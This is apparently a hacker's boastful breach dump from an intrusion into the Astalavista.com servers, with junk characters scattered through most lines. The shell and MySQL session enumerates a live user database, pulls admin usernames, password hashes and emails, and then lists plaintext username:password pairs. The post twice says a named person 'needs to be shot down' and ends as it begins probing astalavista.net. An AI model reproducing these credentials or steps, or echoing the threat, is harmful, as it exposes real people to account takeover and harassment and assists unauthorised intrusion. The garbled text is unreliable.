            $comExploits[$x]['startdate'] = ‘0000-00-00′;) l) y$ B( G) X* b5 O% R( X2 N
            $comExploits[$x]['enddate']   = ‘0000-00-00′;+ s% f1 ^( ]8 i2 b4 N) {+ }
            $comExploits[$x]['status']    = ‘1′;
' u- @$ E$ E& w6 n6 b, s            $comExploits[$x]['changelog'] = $date;
. H6 n  L0 S* c* J' N3 P$ d
+ `5 v# p  z$ x8 b4 J6 y        }5 ]$ h( H8 Z8 q) L: T: x7 F* e
[snip]
" o& `' i5 h  E3 u4 L. y9 H    $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>: u0 d4 ~& l0 N2 ?% D% t/ `
<rss version=”2.0″>5 l8 E: |' H$ N$ a; N4 d
    <channel>
9 \9 l0 t$ r+ t" }# n        <title>ASTALAVISTA.com - Exploits</title>: Q( M% I4 }. _% a' h4 x8 r: d
        <link>http://www.astalavista.com/exploits</link>. a$ `0 Z/ h% `6 M0 I, p
        <description>All availably Exploits.</description>5 R( ^7 N! b; y5 D; |- w; A! Y
        <language>en-us</language>
! k3 D5 q% P3 ?+ |        <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>1 u* ?( W1 \' |2 ?2 ]  e% K. ~" U
        <docs>http://blogs.law.harvard.edu/tech/rss</docs>! T$ v5 C. N  r; r- f
        <generator>Astalavista.com</generator>
' @0 P8 `- Q- ]. i! o6 A5 R" N        <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
8 \* o! r# Q5 X0 e    </channel>
1 r6 s+ w8 W  X; j: l. V</rss>’;
7 x% C* V; G$ r: \2 k" ~5 V+ D% M" ~% e0 \! q  T9 _9 X/ J
    if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {; T4 A6 u' T9 r' m: H: o
        unlink (FULLPATH . ‘/feed/exploits.xml’);
9 f0 K+ h0 }2 N) o    }
3 C; y9 e6 T* a6 S% G' Z& p* \8 X/ a
* Q, }2 z3 G/ n5 {* H! k1 A    file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
4 m5 G- x/ h; W0 E. U[snip]) B8 v3 E: ?) W" ~  i' M
$ S; h# D9 o# P/ t; ]- v
sh-3.2$ cat exploits.sh
; x) f$ y5 p; X2 P% l9 G3 {#!/bin/sh) }' N$ X6 `3 b' X, S5 r
$ N; a8 N! `2 \7 e% x4 Q
###########################################################2 B( `$ I  f& x  ?2 t& x2 ]
#                                                         #
" ~% n; @3 [/ u. w' h#   Title:        milw0rm exploits adder                  #
0 P3 u, ^0 d8 l3 x: q" m#   Description:  Add all milw0rm exploits to the         #
/ C. J+ S, t: D) g% \9 \. g. l7 x#                 Astalavista.com database                #. b/ J! ^) u3 I! z( y0 \
#                                                         #
/ B7 p6 ^4 _( S" D4 S: L+ ~#   Company:      Astalavista Group                       #- ^& W( m: r6 T! s( t2 x3 ?% U
#   Author:       Paulo M. Santos                         #
. u9 h7 Z7 S5 U' d( @2 O#   E-Mail:       链接标记paulo.santos@astalavista.ch             #
9 {# f' P7 _: w9 j" h#                                                         #
/ n* H" Q; |% b* G: Q4 t###########################################################8 Z) K  s! l8 I- v0 O6 \5 T: j
* B, [3 |) p" |( h; Q. c& M5 \- W
# path
& W1 l( o2 H) _8 u7 Tthis_path=/home/com/public_html/modifications/cronjobs
0 Y5 a, h, X/ b( K: a. ?0 b. W" M/ u
# change directory# ?6 G# r) E9 h- N! B, t
cd $this_path
6 ~. r9 A) r. q# q! h  Ucd tmp/2 {6 m( j0 Z' O2 g: c

1 o2 Z4 O7 V; U6 W6 ~! c# delete files
  ?9 a# V% g+ a: o' b: z+ frm -rf milw0rm.tar.* &
' n% s% N7 B; J, S! V8 X% e; E% `rm -rf milw0rm/ &) \8 h9 I: D& k6 q! z- s
: ]7 K) m% ?! }# D" ?
# wget milw0rm paket  G7 S" R, ^+ D% W) n7 t# x
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]& T9 U3 Z) Z9 f7 |9 d' Q
+ o/ ~8 e/ C, d* W
# extract milw0rm paket" c# N  a+ I7 d# r
tar -xvf milw0rm.tar.bz2; A" ^; e2 e  ^! n) y$ S
/ p1 S3 E5 p  c. b5 [
# change owner
  q& U- p$ }" I. L0 o$ y* C6 k: P1 f5 {chown -R com ." S: c. Y; v: c6 Z" m! w( z! V7 Z
chgrp -R com .1 U6 s! Q- J& j0 {+ S

) _7 V# W  x1 R5 u. C( ~, X3 T& o# execute php script
* w$ r  D: M/ Q- Q: [cd $this_path
' l  x$ y) L, B& `6 s; _3 Nphp -q exploits.php
6 e$ G  ?1 R8 }6 R# V6 W) o# D& ^2 F, f. g0 n4 X' U5 h4 u# f
# delete files& u( `0 w  H1 j0 C5 y3 w' d* {- D6 [
rm -rf tmp/milw0rm.tar.*9 F. x% B1 I0 c+ ^* v  u# O! o
rm -rf tmp/milw0rm/
9 f" _: O3 a8 \
; E8 G2 G: J7 `! e" v5 Wsh-3.2$ echo “Paulo M. Santos needs to be shot down.”8 X, s5 h, {: ~) X* ~
Paulo M. Santos needs to be shot down.
7 T- x- P. Q; H2 e/ T. f. h3 u2 F' h0 `; ^. ?
mysql -u contrexxuser2 -p
8 G6 ^" n8 Q5 C# cEnter password:
% a/ j/ h1 ?3 @0 x0 _9 p! qWelcome to the MySQL monitor.  Commands end with ; or \g.3 [, C2 w6 F0 m
Your MySQL connection id is 261694( R8 M  Z$ m4 t' F7 d! Y
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
& H/ N$ X# [5 O6 q2 T% D: U  C
9 ~) o0 r' }" K! ?Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
% O1 w& X1 X( V) o4 D4 n5 {" T. U  r
mysql> show databases;8 D  o4 W$ C4 x( m0 H' B2 `
+——————–+# @; L: n! W+ X4 h0 n. V
| Database           |9 F8 U+ v7 D. a
+——————–+
8 }5 h2 [, w4 [( X( H| information_schema |/ O7 n+ M2 Q% @& b( u) V3 Z' X  Y) y
| com_contrexx2      |
/ X9 x, i& Z+ x: X+ j: L7 f7 H| com_contrexx2_live |
/ f% ~* b- w: u' S6 w5 Z| test               |8 E' Y" F8 j- M1 T& l) \0 e( j
+——————–+
( Y  w( m/ o; k! p5 X4 rows in set (0.00 sec)  P, ~' s1 @( r3 h- [0 L5 ]7 b

1 k- n# l* f0 w( @) T" ]; z* P, Amysql> use com_contrexx2_live
$ `2 m$ u* O+ S7 Z6 A& YDatabase changed
: K, }! W# F; g* hmysql> show tables;
: a7 w; q8 S$ m, |3 K# U+————————————————–+& D, J, c$ Y, i. G& U) v1 q  k& \8 |9 p! g
| Tables_in_com_contrexx2_live                     |
' f! J1 `; Y) Q: q+————————————————–+
8 N8 H9 {0 [9 Y$ p( I; [| cc_banner_counter                                |8 g* Z" G) @- q0 {
| cc_search_counter                                |
3 b, O& C+ G* U) W( `) l+ n' X( @| contrexx_access_group_dynamic_ids                |; r9 U1 L) j, z
| contrexx_access_group_static_ids                 |1 `3 M% l: o2 S" l8 I0 K: W+ {3 l
| contrexx_access_rel_user_group                   |
; C' M8 L1 ]" L0 X" s2 g# W| contrexx_access_settings                         |
* f# a3 F3 ]* u3 |7 J1 S| contrexx_access_user_attribute                   |
/ E& ]3 p+ p9 `6 f1 u| contrexx_access_user_attribute_name              |
! Z! q1 `1 Z, r6 R& Z| contrexx_access_user_attribute_value             |6 \0 S: F6 k2 w* L
| contrexx_access_user_core_attribute              |
, l+ B' h0 x0 \4 d! ~+ o| contrexx_access_user_groups                      |. Z% _7 c2 q! x% q# _
| contrexx_access_user_mail                        |
6 r7 N2 [" g# S9 h4 c6 |6 \| contrexx_access_user_profile                     |9 _) |" G1 m: O; B9 z
| contrexx_access_user_title                       |% }2 _; l. l6 w  v8 u
| contrexx_access_user_validity                    |3 H0 z0 G0 L- \
| contrexx_access_users                            |3 Y9 A# H0 P" d3 U
| contrexx_backend_areas                           |- u0 a4 C. ?" B6 }3 D* }3 S
| contrexx_backups                                 |
' ~7 a# D6 B* `$ m# z| contrexx_content                                 |$ q0 t$ j; d/ _* n
| contrexx_content_history                         |' H0 P. N: s2 F# ]# |# v5 I. T
| contrexx_content_logfile                         |$ n! y1 M- G! W2 J4 M3 }+ }+ G
| contrexx_content_navigation                      |% a$ j6 E1 p8 w5 P& c
| contrexx_content_navigation_history              |9 e( k( l2 E; |7 ^, d* x
| contrexx_ids                                     |
* c% ]$ s0 X/ B8 f| contrexx_languages                               |
- |2 ~3 E2 b+ K9 y2 ?| contrexx_lib_country                             |
) L) i: |9 k' F* p/ y! }| contrexx_log                                     |
; T1 L! Y6 S" ^) y) u! ~| contrexx_module_alias_source                     |
5 y& b+ G+ n0 o| contrexx_module_alias_target                     |, N* P# B/ `2 J- O& i2 q
| contrexx_module_block_blocks                     |
: Y& F3 D, v1 S$ X| contrexx_module_block_rel_lang                   |
: Z$ z2 D. K( S: v+ t0 Q$ s0 s| contrexx_module_block_rel_pages                  |
/ U( E8 h3 z- s" j# b* t3 R4 P| contrexx_module_block_settings                   |5 o/ V% t) y5 V+ p( A6 v8 R9 t& `4 I: I
| contrexx_module_blog_categories                  |7 o4 P+ f/ J( |  y- @* }! H
| contrexx_module_blog_comments                    |
$ G0 F- L9 g4 f$ a: l& k" Q& C| contrexx_module_blog_message_to_category         |
) h! ?3 Y0 [+ G$ `3 D, _' N* u, D9 n| contrexx_module_blog_messages                    |
4 Y# _* q( E! Q' W9 G7 r| contrexx_module_blog_messages_lang               |
5 H) V4 ~9 [3 Q+ N% V7 c6 O% @| contrexx_module_blog_networks                    |
% N) p5 |# h' k! || contrexx_module_blog_networks_lang               |
( n0 r0 C* L6 R% H+ t# || contrexx_module_blog_settings                    |  H, Z) u4 e8 ^
| contrexx_module_blog_votes                       |  f/ g: T# k: m/ I9 P
| contrexx_module_calendar                         |/ {+ A. S/ Z' I' j& ^
| contrexx_module_calendar_access                  |
: ?1 |& `% A. P% R  ]| contrexx_module_calendar_categories              |: o3 ^# l( z: {) E2 w6 x2 Z
| contrexx_module_calendar_form_data               |) G  B1 D  l5 K. q: @) B, o
| contrexx_module_calendar_form_fields             |
" @, n4 S; J6 H- U| contrexx_module_calendar_registrations           |
0 j4 U& p1 V' G( a| contrexx_module_calendar_settings                |
7 `, H9 {  j% Y1 [0 o5 M7 K| contrexx_module_calendar_style                   |8 g  v  O6 p/ c
| contrexx_module_contact_form                     |5 W% B. q, p/ I, e/ }% m- {: f
| contrexx_module_contact_form_data                |
0 B' E' F- h0 q$ q9 }' I, c| contrexx_module_contact_form_field               |
! D7 _0 K1 W* T+ I| contrexx_module_contact_settings                 |
% Q, F* Z; \8 ?- T) u8 _5 H| contrexx_module_data_categories                  |
8 P3 B, W, ]- d' T| contrexx_module_data_message_to_category         |# m9 J9 ?2 ^: z( i2 \
| contrexx_module_data_messages                    |- R3 {, X$ u2 ]5 O
| contrexx_module_data_messages_lang               |
& b6 M: T0 i8 y8 D2 S6 v+ q| contrexx_module_data_placeholders                |
" b, L! N0 O/ g7 R& r8 u% ^| contrexx_module_data_settings                    |7 G' f1 b' D) x: X; h* l! I
| contrexx_module_directory_access                 |
& W. k+ |, w- W: r| contrexx_module_directory_categories             |
: H  n9 ]$ z4 Z/ b| contrexx_module_directory_dir                    |( `! B( R3 X: a" w0 s, D
| contrexx_module_directory_inputfields            |' {# q/ C/ w7 F4 c: |
| contrexx_module_directory_levels                 |/ J4 P' [8 c! d" Y5 ^
| contrexx_module_directory_mail                   |0 p, j) ^- l" g6 h1 j
| contrexx_module_directory_rel_dir_cat            |
! X# [2 f7 W$ D/ R  k( D| contrexx_module_directory_rel_dir_level          |
- C3 M7 C; x( Q8 G% b( W| contrexx_module_directory_settings               |
+ V8 Z6 L/ v" U+ g1 Y4 G6 a| contrexx_module_directory_settings_google        |
( p" a( f7 F: `* N4 X1 a, H| contrexx_module_directory_vote                   |
. ~1 B' S9 n9 l) F| contrexx_module_docsys                           |; s% t) I% \; j
| contrexx_module_docsys_categories                |$ O. {% P$ U! t6 O, i; \
| contrexx_module_egov_configuration               |, c+ U/ o; j; C$ h7 w8 b1 s( L2 K
| contrexx_module_egov_orders                      |0 D9 G/ w1 m8 F! @( z
| contrexx_module_egov_product_calendar            |
9 F- _& f. s+ g2 _0 ]| contrexx_module_egov_product_fields              |' V4 X. u6 t" s$ Y/ e
| contrexx_module_egov_products                    |! l/ f, c8 J1 R/ n+ x9 a: i
| contrexx_module_egov_settings                    |& g: F6 u4 Q5 I; }4 Y3 C6 R
| contrexx_module_exploits                         |) C( i. t1 A! G1 J! ~" g
| contrexx_module_exploits_categories              |; ?2 \1 c& O  W2 C+ V, F  a
| contrexx_module_feed_category                    |
$ }4 y3 k# M" ?; u" P; e| contrexx_module_feed_news                        |
) N; M- ?7 |6 {9 D, q" f6 t| contrexx_module_feed_newsml_association          |
; G& S  H2 l4 j| contrexx_module_feed_newsml_categories           |
: H) A+ l" G6 g- p8 }( e4 N| contrexx_module_feed_newsml_documents            |+ i" F( z$ ^1 A% b5 A3 F) _0 x
| contrexx_module_feed_newsml_providers            |7 q1 U$ Z: H( |; m
| contrexx_module_forum_access                     |% x3 ?7 J) B4 G
| contrexx_module_forum_categories                 |
) e" \' P0 B5 m& s| contrexx_module_forum_categories_lang            |5 t" K# _* a: r
| contrexx_module_forum_notification               |
) `! z* o8 S5 _! n9 r  f& m: X| contrexx_module_forum_postings                   |
+ R$ v7 Z$ t) V9 s+ V6 ]| contrexx_module_forum_rating                     |
0 @" z1 T8 s; G. b, d| contrexx_module_forum_settings                   |( Q- y, O& Q/ [! L
| contrexx_module_forum_statistics                 |, u' r, ]# Z$ T$ L, q1 c
| contrexx_module_gallery_categories               |" e) |& E# i$ U- a
| contrexx_module_gallery_comments                 |: n/ y) X: O: c; s) t
| contrexx_module_gallery_language                 |
$ x8 z2 i6 _) e; w6 r0 D- d( m| contrexx_module_gallery_language_pics            |
+ G- Y$ V8 L/ x3 ^% F& @| contrexx_module_gallery_pictures                 |. L% J  h* Q* B( E' m2 [. R
| contrexx_module_gallery_settings                 |8 f+ o- @  S) a  g! ^9 V
| contrexx_module_gallery_votes                    |
; H0 C( ]; @% |' o0 _# R% A$ Z| contrexx_module_guestbook                        |7 a# b; k& G. w6 [; O" Y
| contrexx_module_guestbook_settings               |
/ }3 C" a5 m) U% C. X0 t% I| contrexx_module_livecam                          |' S" Q% r3 D+ P% u' {! y
| contrexx_module_livecam_settings                 |  F* H5 n$ _5 H
| contrexx_module_market                           |2 i: Z' W4 q9 \) Y9 _
| contrexx_module_market_access                    |: n) R; r& D' f! q  x3 F! P/ q  u
| contrexx_module_market_categories                |
0 U6 T& o6 S2 B( k| contrexx_module_market_mail                      |9 Q7 g1 F: K6 j* I. a
| contrexx_module_market_paypal                    |2 B8 z  y1 m$ g3 @5 ~# _0 h. a
| contrexx_module_market_settings                  |4 M+ D# J" V6 w+ z* p
| contrexx_module_market_spez_fields               |/ p- l2 Z2 @  f' w! W
| contrexx_module_mediadir_access                  |
# }1 P2 ]7 S1 T& E8 N7 r, A. [| contrexx_module_mediadir_categories              |
) E8 V2 g. M- D- k3 C$ h| contrexx_module_mediadir_comments                |2 M# ]' b, \/ C& a% b7 w
| contrexx_module_mediadir_dir                     |
# |( b, K: B$ \| contrexx_module_mediadir_inputfields             |
. |& i; F# N# Y| contrexx_module_mediadir_levels                  |
- q  ^/ h4 z* V+ _| contrexx_module_mediadir_mail                    |
8 C. P8 p: L( A& Q' Z% [$ z5 v| contrexx_module_mediadir_rel_dir_cat             |5 Q) w! {* ?7 Y9 J
| contrexx_module_mediadir_rel_dir_level           |
) M7 d# S) e$ [- F% G| contrexx_module_mediadir_reports                 |; E" T& U" T8 E% I# b
| contrexx_module_mediadir_settings                |
) f# f! a# G- A| contrexx_module_mediadir_settings_google         |
, w, e% @' [' Y- B2 f* {2 x| contrexx_module_mediadir_vote                    |
2 Q9 J5 \, q* t* y  l) J" x) c| contrexx_module_memberdir_directories            |
4 N0 f! O% G2 g1 g' C# }' v| contrexx_module_memberdir_name                   |
* N& @! y$ @! j$ n2 j) ~: ?| contrexx_module_memberdir_settings               |
: I6 h6 k. e+ w1 F/ l2 k| contrexx_module_memberdir_values                 |
$ ~' w0 ?$ j+ J8 z  h, h| contrexx_module_nettools_allowed_groups          |
3 W* C8 \& M: f: h| contrexx_module_nettools_settings                |
: e% l& _  i6 G| contrexx_module_news                             |0 r2 O1 Q4 Y, J$ R* H- _
| contrexx_module_news_access                      |
( o! q6 N, u: C) L2 |7 l| contrexx_module_news_categories                  |
% {* R6 S' c( b+ J| contrexx_module_news_settings                    |
! Q2 n+ k: u! X4 Q" e' C. Q' ~| contrexx_module_news_teaser_frame                |
3 t2 \  N% G) y2 S: J4 S| contrexx_module_news_teaser_frame_templates      |  L8 T3 ?, }. Q) m% L# r: d
| contrexx_module_news_ticker                      |1 V: p$ i/ f' c# D
| contrexx_module_newsletter                       |$ d7 {2 t( h$ K+ v. R% O
| contrexx_module_newsletter_attachment            |8 g; {, q# r  \* E6 ^
| contrexx_module_newsletter_category              |
$ d" F0 r) X. ~9 m| contrexx_module_newsletter_confirm_mail          |
1 A  `: j9 D) e/ Q| contrexx_module_newsletter_rel_cat_news          |. v5 M2 K9 d% }8 }  h0 U5 q
| contrexx_module_newsletter_rel_user_cat          |/ ~+ A7 G) r" M
| contrexx_module_newsletter_settings              |4 B: r' i# c' Q  J4 i+ ~  u/ E8 v
| contrexx_module_newsletter_template              |
$ \! P4 r. I- y- b, X- @| contrexx_module_newsletter_tmp_sending           |
/ _1 V) Q% \1 r, y# F  ^# v| contrexx_module_newsletter_user                  |
; y3 N9 J( P3 X| contrexx_module_newsletter_user_title            |% y: k. q# I9 v2 ^) v) u
| contrexx_module_onlinetools_defaultports         |! _: \+ s5 r6 i1 K0 K; F1 W) |7 _
| contrexx_module_onlinetools_defaultports_back    |
7 u% e$ Q7 Y- M, \& X* d1 h& e* W| contrexx_module_onlinetools_geolitecity_blocks   |, {- \! J. b6 q4 k# }/ M
| contrexx_module_onlinetools_geolitecity_country  |) c6 m  i: {1 s9 l
| contrexx_module_onlinetools_geolitecity_location |: T: [$ M5 I9 t9 G; a& P- y7 s" U
| contrexx_module_podcast_category                 |- Y8 m7 \4 `; [' O: n
| contrexx_module_podcast_medium                   |
6 F3 ~  X8 S0 y6 Y| contrexx_module_podcast_rel_category_lang        |
1 |) v5 I  A! H9 i| contrexx_module_podcast_rel_medium_category      |& `" ]  `  {/ o  G! K3 A
| contrexx_module_podcast_settings                 |
9 O4 q; I' H5 n| contrexx_module_podcast_template                 |, t5 Y) E( y: G3 ^% w. X
| contrexx_module_proxydb                          |: h3 S7 {# u# ?3 C8 [' F- ^* {& y8 {
| contrexx_module_recommend                        |
3 o% c5 c: y. D" K9 d7 A' }8 u| contrexx_module_repository                       |
! z7 ^5 V" y8 u6 n) S- b8 }| contrexx_module_securitynews_cats                |9 r/ ^2 y1 B9 f$ N. {5 d+ e
| contrexx_module_securitynews_feeds               |
3 a: L- X/ a5 }| contrexx_module_securitynews_news                |
) H* b: P5 x' E$ r8 A  \| contrexx_module_shop_categories                  |. K9 x  R& {& v. l
| contrexx_module_shop_config                      |' W7 A9 E$ z6 w% M* L: K5 [! F: c
| contrexx_module_shop_countries                   |
2 [( f2 x: @1 Q4 {6 w| contrexx_module_shop_currencies                  |
" ^- v* }. C/ n" \% O| contrexx_module_shop_customers                   |
" u0 K5 q. _) J| contrexx_module_shop_importimg                   |; [! L' ^( E2 t
| contrexx_module_shop_lsv                         |" E* H% v9 ?$ }" U7 e/ a
| contrexx_module_shop_mail                        |
* I( r- _4 N* m| contrexx_module_shop_mail_content                |
: T/ F' G! `' w, V6 U| contrexx_module_shop_manufacturer                |3 i( x. X  t' F+ d( K8 B
| contrexx_module_shop_order_items                 |0 m+ a$ u9 j6 f* o! `" g: @" l
| contrexx_module_shop_order_items_attributes      |
- D; b- c9 k" }7 P0 A| contrexx_module_shop_orders                      |
0 c' b: \4 w. t2 X8 Y| contrexx_module_shop_payment                     |
3 r5 {4 I9 @1 l% F# e| contrexx_module_shop_payment_processors          |
; g7 V! W% m; t1 a| contrexx_module_shop_pricelists                  |
; s' w& P9 e0 ]$ D| contrexx_module_shop_products                    |* W  Z' _& d( k" [. E6 M
| contrexx_module_shop_products_attributes         |4 b5 r7 d/ t" ^( X+ U
| contrexx_module_shop_products_attributes_name    |" }8 i: o, ?; h. n* I8 {4 V
| contrexx_module_shop_products_attributes_value   |; E6 }+ y5 |3 {# C4 x
| contrexx_module_shop_products_downloads          |
# F8 V5 d* c# K5 Z+ C| contrexx_module_shop_rel_countries               |
, c! \. P: B, c. W| contrexx_module_shop_rel_payment                 |5 v. \4 ]: j% E/ a
| contrexx_module_shop_rel_shipment                |/ D1 \% @0 j8 j! Q
| contrexx_module_shop_shipment_cost               |: n  y6 ~8 M5 U) f2 _4 {; d
| contrexx_module_shop_shipper                     |0 E$ d8 _# }1 U  E& H
| contrexx_module_shop_vat                         |
" U" T# h  S" U* _/ m9 m7 e| contrexx_module_shop_zones                       |
/ [& A3 w, ]% _1 m9 Y8 C5 H| contrexx_module_u2u_address_list                 |
/ ~: H8 Y: p: s. _/ y% || contrexx_module_u2u_message_log                  |  ~( H% n) [4 L/ A
| contrexx_module_u2u_sent_messages                |0 h/ ]: ?4 n9 w% b( m/ m4 K: n
| contrexx_module_u2u_settings                     |! ]) W8 d4 w6 H8 O- t5 ]9 P8 ]0 Z8 S
| contrexx_module_u2u_user_log                     |2 ^& M. S2 E4 i% F
| contrexx_modules                                 |
( ~9 @) V2 S6 i- g& L* d# E| contrexx_sessions                                |6 L2 a3 B, |$ ~3 H+ n  W
| contrexx_settings                                |
$ q7 H# _8 ?& H1 h5 H% L) `0 ]6 w1 p! T| contrexx_settings_smtp                           |
8 }' k( R+ o1 B! `( M| contrexx_skins                                   |
8 p) B1 ]9 v& ]( m| contrexx_stats_browser                           |
& J, l( f  \; o7 ?- S0 W% Q| contrexx_stats_colourdepth                       |
, G5 h7 F8 L. k4 }; s- s| contrexx_stats_config                            |" i  L  X8 q2 H) f3 \) h
| contrexx_stats_country                           |
. n; l) E, E0 U| contrexx_stats_hostname                          |
/ u2 W5 a) J; z- s' _| contrexx_stats_javascript                        |
% v8 V* j4 r% E$ I" \4 h2 q1 @| contrexx_stats_operatingsystem                   |2 o9 [& ]" x; C: y+ Q! ?1 v
| contrexx_stats_referer                           |
( i0 a* ^0 P' j9 ^| contrexx_stats_requests                          |# D* ]4 X" p1 T* q  f) @6 |/ P
| contrexx_stats_requests_summary                  |
  h+ e9 O7 }7 R, x| contrexx_stats_screenresolution                  |8 V9 k% r# ?& ?/ |$ f3 X6 i
| contrexx_stats_search                            |/ n- u7 e  r* U* v; g
| contrexx_stats_spiders                           |
  Y; ?  O* J3 }! f- X| contrexx_stats_spiders_summary                   |; w5 e" F# Z* |
| contrexx_stats_visitors                          |
3 k6 _8 M7 L5 M5 ]| contrexx_stats_visitors_summary                  |
) l# }0 t) q1 Z: g| contrexx_voting_additionaldata                   |4 L# ~0 X. M5 a
| contrexx_voting_email                            |7 C+ C, B; M3 b* G1 _/ ~
| contrexx_voting_rel_email_system                 |: U# K$ I' @2 K6 ]9 I
| contrexx_voting_results                          |
& I' J8 i  ?1 k2 d| contrexx_voting_system                           |
  G5 I; {# B6 X4 j| foo                                              |
$ g' S$ m9 s% L' e+————————————————–++ g( U7 z* t1 ]0 n# y
227 rows in set (0.01 sec)" A  r6 |4 b" w$ G
+ q* c% C6 C, [' m2 R  F
mysql> select count(*) as skids from contrexx_access_users;
. H9 Z' D) _6 J0 ~  @, c  {0 ^+——-+$ P" B* W0 B( B* `6 N6 W
| skids |
1 d& P4 |/ D  a! t9 M# K! F+——-+1 f6 R2 z( C! s
| 53699 |7 s& Z& f% z$ c+ ?$ v9 `
+——-+2 X7 t" V1 r6 a
1 row in set (0.00 sec)6 B$ C8 d: I; n$ x- R& ~
4 m: g8 H+ i5 W1 ]/ a
mysql> describe contrexx_access_users;1 ]: T9 N# D& D9 U3 a
+——————+——————————————+——+—–+————–+—————-+
  W( K1 t# }" `; g| Field            | Type                                     | Null | Key | Default      | Extra          |
& b, s/ \8 Q! e3 [: ]! R+——————+——————————————+——+—–+————–+—————-+" w5 ~7 D/ F$ B! C
| id               | int(10) unsigned                         | NO   | PRI | NULL         | auto_increment |  q1 G2 H: R) m
| is_admin         | tinyint(1) unsigned                      | NO   |     | 0            |                |" e6 J8 p& V5 ?5 ?. v6 `% x
| username         | varchar(40)                              | YES  | MUL | NULL         |                |: n3 u0 b* G3 S2 a
| password         | varchar(32)                              | YES  |     | NULL         |                |
+ @) A" ~2 |6 {  w" j+ J8 _| regdate          | int(14) unsigned                         | NO   |     | 0            |                |
4 d. Q' m5 [' H- M8 c/ D| expiration       | int(14) unsigned                         | NO   |     | 0            |                |
# M1 p5 ?' Z$ L| validity         | int(10) unsigned                         | NO   |     | 0            |                |
1 z" z2 n9 Y7 ~9 U' ]9 |) o| last_auth        | int(14) unsigned                         | NO   |     | 0            |                |
' C$ U! \7 t7 X7 v$ t| last_activity    | int(14) unsigned                         | NO   |     | 0            |                |
5 N. }  h7 A# c8 |- B| email            | varchar(255)                             | YES  |     | NULL         |                |  a# M/ S8 w4 v8 [& F
| email_access     | enum(’everyone’,'members_only’,'nobody’) | NO   |     | nobody       |                |
4 U, o3 p( u' ~, T4 z| frontend_lang_id | int(2) unsigned                          | NO   |     | 0            |                |
2 t8 c+ ^6 L2 b| backend_lang_id  | int(2) unsigned                          | NO   |     | 0            |                |
- Y) _/ F; R, T7 O1 I" p  j9 c| active           | tinyint(1)                               | NO   |     | 0            |                |0 [# O) c/ Q" U6 P4 G5 v$ ?9 Q
| profile_access   | enum(’everyone’,'members_only’,'nobody’) | NO   |     | members_only |                |7 H" I2 I. ^$ I. i1 }
| restore_key      | varchar(32)                              | NO   |     |              |                |
& V' p  o2 ^, e0 y| restore_key_time | int(14) unsigned                         | NO   |     | 0            |                |5 e( p% V& E) d. B) F4 z0 v0 ?, ?
| u2u_active       | enum(’0′,’1′)                            | NO   |     | 1            |                |
( w1 V: L6 t" H: Q% @" @+——————+——————————————+——+—–+————–+—————-+
, b7 Q$ H$ e% j18 rows in set (0.00 sec)+ f/ l/ y* ]- T, i4 |) x7 o
0 U* n: a( s7 I. j
mysql> select username,password,email from contrexx_access_users where is_admin = 1;/ n* P; G5 [* u2 P$ \
+————+———————————-+—————————–+
) T) e: B4 G7 D| username   | password                         | email                       |
1 Q  l4 Y; B, d  v+————+———————————-+—————————–+
! M2 w1 \" w0 {4 t+ e1 f: m| system     | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com          |
' x0 L+ N3 G8 q; k' t; G| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com      |
: g0 t( c) h: ~0 J& W| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |/ p% a- D, R" _% b, M
| schmid     | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com   |
! z4 f5 @% `1 m' M* G( v; Z6 m& ~+————+———————————-+—————————–+
* \! K# x% B7 c  }& F4 rows in set (0.04 sec)% p, u# ?; }7 m* f: T2 ~

' {+ ~. C3 ?6 s4 l' Hmysql> exit;& N  q6 e* \$ `" ^3 `$ N
Bye8 ?- u6 V% c6 o

3 s' Z+ R; R5 O0 K[~] There you go, your “team of security and IT professionals” is a joke.; K2 z# T, [2 [' v3 |
- I  ^, B- n. ?
+——————————+
  x+ z% t6 `  Asystem:f82BN3+_*
0 d: p: g/ u7 u2 c8 E9 NBe1er0ph0r:belerophor4astacom& e" `3 a" P; r+ E. M" Q) w
prozac:asta4cms!
3 W1 J! F0 C( O$ f9 D! W* Q) Dcommander:mpbdaagf6m! M/ L/ t$ ^; R. K, U$ t* f
sykadul:ak29eral& U2 g+ V7 w: p: _  i# h
+——————————+5 a4 v$ k6 i- y2 h7 X

3 Q' r7 O! T- _$ f" J% V+ r[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)# v( W9 s$ d4 z0 w# ]1 E
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
8 E/ K1 Y$ ^0 k# _8 K
# z* U7 c& G7 b& D; e- h[~] Lets move to astalavista.net now,
( x1 u+ s- A2 t2 \6 X0 d
7 d8 k) |% E6 N. |( H4 |4 uFrom <链接标记[url]https://www.astalavista.net/[/url]>:
  b! `4 v, S+ w- D7 B. n2 M" X>> Everyone knows that the best defense is a good offense.. L& ]( l2 c# d4 j! t$ G1 D+ ?
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
0 B4 p- ?, @9 R, U>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.2 I# n4 X( g! c% ~( w
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
3 Q, t- t) z) @4 G! |& F3 g
7 J6 _7 n! [4 g& |7 Y$ `>> Go ahead, try and hack our server . in a completely legal way!
6 P7 B  J. @& A6 k>> Learn by doing: We offer our members tricky tasks and challenges on an$ s/ X* B$ V' i: M2 K
>> ongoing basis so you can test your knowledge and abilities. You can also
& L1 j! A! c- U" Z>> demonstrate what you.ve mastered by taking part in regular hacker contests
9 M$ n# G3 O/ `>> and war games
1 X. r* W8 Z+ V
# j: C. L- M. e[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
" s- q- G7 L+ p& b% ]: X( y2 h/ T! Q+ }+ B9 I# t% w& U
[-] Tricky task: Find home dir of astalavista.net( ?' A& f( r9 O' h! g

: Y& s( A  _" R' A/ Bsh-3.2$ ls -la ~astanet
